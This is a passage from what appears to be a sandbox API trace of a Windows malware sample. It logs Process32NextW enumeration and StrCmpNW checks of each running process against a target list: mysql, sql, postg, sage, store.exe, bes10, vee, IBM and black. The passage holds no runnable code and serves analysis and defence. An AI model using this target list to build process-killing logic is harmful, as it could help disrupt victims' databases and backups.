(lpStr1="svch", lpStr2="sage", nChar=4) returned 1 [0057.614] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0057.614] StrCmpNW (lpStr1="dwm.e", lpStr2="mysql", nChar=5) returned -1 [0057.614] StrCmpNW (lpStr1="dwm", lpStr2="IBM", nChar=3) returned -1 [0057.614] StrCmpNW (lpStr1="dwm.e", lpStr2="bes10", nChar=5) returned 1 [0057.614] StrCmpNW (lpStr1="dwm.e", lpStr2="black", nChar=5) returned 1 [0057.614] StrCmpNW (lpStr1="dwm", lpStr2="sql", nChar=3) returned -1 [0057.614] StrCmpNW (lpStr1="dwm.exe", lpStr2="store.exe", nChar=9) returned -1 [0057.615] StrCmpNW (lpStr1="dwm", lpStr2="vee", nChar=3) returned -1 [0057.615] StrCmpNW (lpStr1="dwm.e", lpStr2="postg", nChar=5) returned -1 [0057.615] StrCmpNW (lpStr1="dwm.", lpStr2="sage", nChar=4) returned -1 [0057.615] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x62, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.615] StrCmpNW (lpStr1="svcho", lpStr2="mysql", nChar=5) returned 1 [0057.615] StrCmpNW (lpStr1="svc", lpStr2="IBM", nChar=3) returned 1 [0057.615] StrCmpNW (lpStr1="svcho", lpStr2="bes10", nChar=5) returned 1 [0057.615] StrCmpNW (lpStr1="svcho", lpStr2="black", nChar=5) returned 1 [0057.616] StrCmpNW (lpStr1="svc", lpStr2="sql", nChar=3) returned 1 [0057.616] StrCmpNW (lpStr1="svchost.e", lpStr2="store.exe", nChar=9) returned 1 [0057.616] StrCmpNW (lpStr1="svc", lpStr2="vee", nChar=3) returned -1 [0057.616] StrCmpNW (lpStr1="svcho", lpStr2="postg", nChar=5) returned 1 [0057.616] StrCmpNW (lpStr1="svch", lpStr2="sage", nChar=4) returned 1 [0057.616] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.616] StrCmpNW (lpStr1="svcho", lpStr2="mysql", nChar=5) returned 1 [0057.616] StrCmpNW (lpStr1="svc", lpStr2="IBM", nChar=3) returned 1 [0057.616] StrCmpNW (lpStr1="svcho", lpStr2="bes10", nChar=5) returned 1 [0057.616] StrCmpNW (lpStr1="svcho", lpStr2="black", nChar=5) returned 1 [0057.616] StrCmpNW (lpStr1="svc", lpStr2="sql", nChar=3) returned 1 [0057.616] StrCmpNW (lpStr1="svchost.e", lpStr2="store.exe", nChar=9) returned 1 [0057.616] StrCmpNW (lpStr1="svc", lpStr2="vee", nChar=3) returned -1 [0057.616] StrCmpNW (lpStr1="svcho", lpStr2="postg", nChar=5) returned 1 [0057.617] StrCmpNW (lpStr1="svch", lpStr2="sage", nChar=4) returned 1 [0057.617] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.617] StrCmpNW (lpStr1="svcho", lpStr2="mysql", nChar=5) returned 1 [0057.617] StrCmpNW (lpStr1="svc", lpStr2="IBM", nChar=3) returned 1 [0057.617] StrCmpNW (lpStr1="svcho", lpStr2="bes10", nChar=5) returned 1 [0057.617] StrCmpNW (lpStr1="svcho", lpStr2="black", nChar=5) returned 1 [0057.617] StrCmpNW (lpStr1="svc", lpStr2="sql", nChar=3) returned 1 [0057.617] StrCmpNW (lpStr1="svchost.e", lpStr2="store.exe", nChar=9) returned 1 [0057.617] StrCmpNW (lpStr1="svc", lpStr2="vee", nChar=3) returned -1 [0057.617] StrCmpNW (lpStr1="svcho", lpStr2="postg", nChar=5) returned 1 [0057.618] StrCmpNW (lpStr1="svch", lpStr2="sage", nChar=4) returned 1 [0057.618] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.618] StrCmpNW (lpStr1="svcho", lpStr2="mysql", nChar=5) returned 1 [0057.618] StrCmpNW (lpStr1="svc", lpStr2="IBM", nChar=3) returned 1 [0057.618] StrCmpNW (lpStr1="svcho", lpStr2="bes10", nChar=5) returned 1 [0057.618] StrCmpNW (lpStr1="svcho", lpStr2="black", nChar=5) returned 1 [0057.618] StrCmpNW (lpStr1="svc", lpStr2="sql", nChar=3) returned 1 [0057.618] StrCmpNW (lpStr1="svchost.e", lpStr2="store.exe", nChar=9) returned 1 [0057.618] StrCmpNW (lpStr1="svc", lpStr2="vee", nChar=3) returned -1 [0057.619] StrCmpNW (lpStr1="svcho", lpStr2="postg", nChar=5) returned 1 [0057.619] StrCmpNW (lpStr1="svch", lpStr2="sage", nChar=4) returned 1 [0057.619] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.619] StrCmpNW (lpStr1="svcho", lpStr2="mysql", nChar=5) returned 1 [0057.619] StrCmpNW (lpStr1="svc", lpStr2="IBM", nChar=3) returned 1 [0057.619] StrCmpNW (lpStr1="svcho", lpStr2="bes10", nChar=5) returned 1 [0057.619] StrCmpNW (lpStr1="svcho", lpStr2="black", nChar=5) returned 1 [0057.619] StrCmpNW (lpStr1="svc", lpStr2="sql", nChar=3) returned 1 [0057.619] StrCmpNW (lpStr1="svchost.e", lpStr2="store.exe", nChar=9) returned 1 [0057.619] StrCmpNW (lpStr1="svc", lpStr2="vee", nChar=3) returned -1 [0057.619] StrCmpNW (lpStr1="svcho", lpStr2="postg", nChar=5) returned 1 [0057.619] StrCmpNW (lpStr1="svch", lpStr2="sage", nChar=4) returned 1 [0057.619] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.620] StrCmpNW (lpStr1="svcho", lpStr2="mysql", nChar=5) returned 1 [0057.620] StrCmpNW (lpStr1="svc", lpStr2="IBM", nChar=3) returned 1 [0057.620] StrCmpNW (lpStr1="svcho", lpStr2="bes10", nChar=5) returned 1 [0057.620] StrCmpNW (lpStr1="svcho", lpStr2="black", nChar=5) returned 1 [0057.620] StrCmpNW (lpStr1="svc", lpStr2="sql", nChar=3) returned 1 [0057.620] StrCmpNW (lpStr1="svchost.e", lpStr2="store.exe", nChar=9) returned 1 [0057.620] StrCmpNW (lpStr1="svc", lpStr2="vee", nChar=3) returned -1 [0057.620] StrCmpNW (lpStr1="svcho", lpStr2="postg", nChar=5) returned 1 [0057.620] StrCmpNW (lpStr1="svch", lpStr2="sage", nChar=4) returned 1 [0057.620] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.621] StrCmpNW (lpStr1="svcho", lpStr2="mysql", nChar=5) returned 1 [0057.621] StrCmpNW (lpStr1="svc", lpStr2="IBM", nChar=3) returned 1 [0057.621] StrCmpNW (lpStr1="svcho", lpStr2="bes10", nChar=5) returned 1 [0057.621] StrCmpNW (lpStr1="svcho", lpStr2="black", nChar=5) returned 1 [0057.621] StrCmpNW (lpStr1="svc", lpStr2="sql", nChar=3) returned 1 [0057.621] StrCmpNW (lpStr1="svchost.e", lpStr2="store.exe", nChar=9) returned 1 [0057.621] StrCmpNW (lpStr1="svc", lpStr2="vee", nChar=3) returned -1 [0057.621] StrCmpNW (lpStr1="svcho", lpStr2="postg", nChar=5) returned 1 [0057.621] StrCmpNW (lpStr1="svch", lpStr2="sage", nChar=4) returned 1 [0057.621] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.622] StrCmpNW (lpStr1="svcho", lpStr2="mysql", nChar=5) returned 1 [0057.622] StrCmpNW (lpStr1="svc", lpStr2="IBM", nChar=3) returned 1 [0057.622] StrCmpNW (lpStr1="svcho", lpStr2="bes10", nChar=5) returned 1 [0057.622] StrCmpNW (lpStr1="svcho", lpStr2="black", nChar=5) returned 1 [0057.622] StrCmpNW (lpStr1="svc", lpStr2="sql", nChar=3) returned 1 [0057.622] StrCmpNW (lpStr1="svchost.e", lpStr2="store.exe", nChar=9) returned 1 [0057.622] StrCmpNW (lpStr1="svc", lpStr2="vee", nChar=3) returned -1 [0057.622] StrCmpNW (lpStr1="svcho", lpStr2="postg", nChar=5) returned 1 [0057.622] StrCmpNW (lpStr1="svch", lpStr2="sage", nChar=4) returned 1 [0057.622] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.623] StrCmpNW (lpStr1="svcho", lpStr2="mysql", nChar=5) returned 1 [0057.623] StrCmpNW (lpStr1="svc", lpStr2="IBM", nChar=3) returned 1 [0057.623] StrCmpNW (lpStr1="svcho", lpStr2="bes10", nChar=5) returned 1 [0057.623] StrCmpNW (lpStr1="svcho", lpStr2="black", nChar=5) returned 1 [0057.623] StrCmpNW (lpStr1="svc", lpStr2="sql", nChar=3) returned 1 [0057.623] StrCmpNW (lpStr1="svchost.e", lpStr2="store.exe", nChar=9) returned 1 [0057.623] StrCmpNW (lpStr1="svc", lpStr2="vee", nChar=3) returned -1 [0057.623] StrCmpNW (lpStr1="svcho", lpStr2="postg", nChar=5) returned 1 [0057.623] StrCmpNW (lpStr1="svch", lpStr2="sage", nChar=4) returned 1 [0057.623] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0057.624] StrCmpNW (lpStr1="spool", lpStr2="mysql", nChar=5) returned 1 [0057.624] StrCmpNW (lpStr1="spo", lpStr2="IBM", nChar=3) returned 1 [0057.624] StrCmpNW (lpStr1="spool", lpStr2="bes10", nChar=5) returned 1 [0057.624] StrCmpNW (lpStr1="spool", lpStr2="black", nChar=5) returned 1 [0057.624] StrCmpNW (lpStr1="spo", lpStr2="sql", nChar=3) returned -1 [0057.624] StrCmpNW (lpStr1="spoolsv.e", lpStr2="store.exe", nChar=9) returned -1 [0057.624] StrCmpNW (lpStr1="spo", lpStr2="vee", nChar=3) returned -1 [0057.624] StrCmpNW (lpStr1="spool", lpStr2="postg", nChar=5) returned 1 [0057.624] StrCmpNW (lpStr1="spoo", lpStr2="sage", nChar=4) returned 1 [0057.624] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.625] StrCmpNW (lpStr1="svcho", lpStr2="mysql", nChar=5) returned 1 [0057.625] StrCmpNW (lpStr1="svc", lpStr2="IBM", nChar=3) returned 1 [0057.625] StrCmpNW (lpStr1="svcho", lpStr2="bes10", nChar=5) returned 1 [0057.625] StrCmpNW (lpStr1="svcho", lpStr2="black", nChar=5) returned 1 [0057.625] StrCmpNW (lpStr1="svc", lpStr2="sql", nChar=3) returned 1 [0057.625] StrCmpNW (lpStr1="svchost.e", lpStr2="store.exe", nChar=9) returned 1 [0057.625] StrCmpNW (lpStr1="svc", lpStr2="vee", nChar=3) returned -1 [0057.625] StrCmpNW (lpStr1="svcho", lpStr2="postg", nChar=5) returned 1 [0057.625] StrCmpNW (lpStr1="svch", lpStr2="sage", nChar=4) returned 1 [0057.625] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.626] StrCmpNW (lpStr1="svcho", lpStr2="mysql", nChar=5) returned 1 [0057.626] StrCmpNW (lpStr1="svc", lpStr2="IBM", nChar=3) returned 1 [0057.626] StrCmpNW (lpStr1="svcho", lpStr2="bes10", nChar=5) returned 1 [0057.626] StrCmpNW (lpStr1="svcho", lpStr2="black", nChar=5) returned 1 [0057.626] StrCmpNW (lpStr1="svc", lpStr2="sql", nChar=3) returned 1 [0057.626] StrCmpNW (lpStr1="svchost.e", lpStr2="store.exe", nChar=9) returned 1 [0057.626] StrCmpNW (lpStr1="svc", lpStr2="vee", nChar=3) returned -1 [0057.626] StrCmpNW (lpStr1="svcho", lpStr2="postg", nChar=5) returned 1 [0057.626] StrCmpNW (lpStr1="svch", lpStr2="sage", nChar=4) returned 1 [0057.626] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0057.626] StrCmpNW (lpStr1="audio", lpStr2="mysql", nChar=5) returned -1 [0057.626] StrCmpNW (lpStr1="aud", lpStr2="IBM", nChar=3) returned -1 [0057.627] StrCmpNW (lpStr1="audio", lpStr2="bes10", nChar=5) returned -1 [0057.627] StrCmpNW (lpStr1="audio", lpStr2="black", nChar=5) returned -1 [0057.627] StrCmpNW (lpStr1="aud", lpStr2="sql", nChar=3) returned -1 [0057.627] StrCmpNW (lpStr1="audiodg.e", lpStr2="store.exe", nChar=9) returned -1 [0057.627] StrCmpNW (lpStr1="aud", lpStr2="vee", nChar=3) returned -1 [0057.627] StrCmpNW (lpStr1="audio", lpStr2="postg", nChar=5) returned -1 [0057.627] StrCmpNW (lpStr1="audi", lpStr2="sage", nChar=4) returned -1 [0057.627] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0057.627] StrCmpNW (lpStr1="sihos", lpStr2="mysql", nChar=5) returned 1 [0057.627] StrCmpNW (lpStr1="sih", lpStr2="IBM", nChar=3) returned 1 [0057.627] StrCmpNW (lpStr1="sihos", lpStr2="bes10", nChar=5) returned 1 [0057.627] StrCmpNW (lpStr1="sihos", lpStr2="black", nChar=5) returned 1 [0057.627] StrCmpNW (lpStr1="sih", lpStr2="sql", nChar=3) returned -1 [0057.628] StrCmpNW (lpStr1="sihost.ex", lpStr2="store.exe", nChar=9) returned -1 [0057.628] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.628] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0057.629] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0057.629] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0057.630] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3d, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0057.631] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0057.631] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0057.632] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0057.632] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0057.634] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0057.634] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0057.635] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0057.635] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0057.636] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0057.637] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0057.637] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0057.638] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0057.639] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0057.639] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0057.640] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="screensaver.exe")) returned 1 [0057.640] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="nancy edge empty.exe")) returned 1 [0057.641] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x798, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="sets buying.exe")) returned 1 [0057.641] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="surveillance.exe")) returned 1 [0057.650] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="production-meanwhile-legends.exe")) returned 1 [0057.650] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="mhzarchived.exe")) returned 1 [0057.651] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x654, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="prices-mug-writes.exe")) returned 1 [0057.652] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="buddythorough.exe")) returned 1 [0057.652] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="moments-allied-tasks.exe")) returned 1 [0057.653] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="antoniostreetpowers.exe")) returned 1 [0057.653] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="federationcustoms.exe")) returned 1 [0057.654] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="dome delivering product.exe")) returned 1 [0057.655] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="wrist_exhaust_wires.exe")) returned 1 [0057.656] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="proteinsabsorptionvalues.exe")) returned 1 [0057.657] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="mid developer.exe")) returned 1 [0057.657] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: lppe=0x19e8b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="tested.exe")) returned 1 [0057.658] Process32NextW (in: hSnapshot=0x300, lppe=0x19e8b0 | out: 